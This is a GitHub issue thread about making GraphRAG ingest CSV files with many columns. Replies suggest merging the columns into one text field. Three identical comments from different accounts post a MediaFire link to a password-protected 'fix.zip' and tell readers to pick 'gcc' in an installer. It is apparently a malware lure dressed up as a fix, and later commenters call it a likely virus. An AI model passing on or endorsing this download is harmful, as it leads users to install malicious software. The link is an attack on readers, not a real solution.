### ISSUE TITLE
[Issue]: <title> how to use csv with multiple columns

### ISSUE THREAD

**Issue by JadeXIN** [microsoft/graphrag#1025]
### Do you need to file an issue?

- [ ] I have searched the existing issues and this bug is not already filed.
- [ ] My model is hosted on OpenAI or Azure. If not, please look at the "model providers" issue and don't file a new one here.
- [ ] I believe this is a legitimate bug, not just a question. If this is a question, please use the Discussions area.

### Describe the issue

i have seen the source code csv.py for loading csv, but I see that it can only handle csv file with source and text columns. but in practice, the csv files often contain many columns. how to handle this type of csv file with rag. how to modify the settings.yaml file.

### GraphRAG Config Used

```yaml
# Paste your config here

```

### Additional Information

- GraphRAG Version:
- Operating System:
- Python Version:
- Related Issues:

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JadeXIN** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what's this

**Comment by PetricaR** [comment]
virus?

**Comment by JadeXIN** [comment]
> virus?

it seems you are correct....who knows the solution

**Comment by natoverse** [comment]
What are you looking to do with the additional columns? If you have multiple fields of text that you want as input to the graph extraction, you can concatenate them in a pre-processing script. But we don't currently support any form of metadata/column-based filtering, so I'm not sure what the use case is.

**Comment by matbee-eth** [comment]
Curious what the point of supporting CSV is if you cant select which columns to use?

**Comment by JadeXIN** [comment]
> What are you looking to do with the additional columns? If you have multiple fields of text that you want as input to the graph extraction, you can concatenate them in a pre-processing script. But we don't currently support any form of metadata/column-based filtering, so I'm not sure what the use case is.

Hi,

I have some CSV files with multiple columns. I want graphRAG can help me to understand them. for example, given a report about occupation safety, we have a list of accidents record, it can analyse that what type of the accident is tend to happen in which conditions. but I find graphRAG cannot understand the csv file with multiple columns.

**Comment by JadeXIN** [comment]
> Curious what the point of supporting CSV is if you cant select which columns to use?

i hope graphRAG can understand the file considering multiple columns. because many reports contain more than 2 type of columns but I find currently graphRAG can only include 2 columns?

**Comment by zhuwanfeng007** [comment]
Perhaps you can merge all of your columns together as text columns and then describe the combined content separately
